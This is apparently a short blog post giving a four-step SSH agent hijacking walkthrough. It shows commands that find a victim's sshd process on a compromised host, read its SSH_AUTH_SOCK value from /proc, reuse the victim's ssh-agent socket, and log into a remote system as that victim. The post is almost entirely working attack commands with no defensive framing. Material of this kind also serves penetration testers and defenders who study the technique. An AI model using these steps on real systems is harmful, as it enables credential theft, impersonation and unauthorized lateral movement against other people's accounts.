SSH Hijacking
Post

SSH Hijacking

Step 1: We first determine the SSH process ID of the user on the compromised host:

1
ps aux |grep sshd

Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID:

1
grep SSH_AUTH_SOCK /proc/<PID>/environ

Step 3: We then hijack the targets ssh-agent socket:

1
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add –l

Step 4: Finally, we log into the remote system our victim is logged into as the target:

1
ssh remotesystem -l victim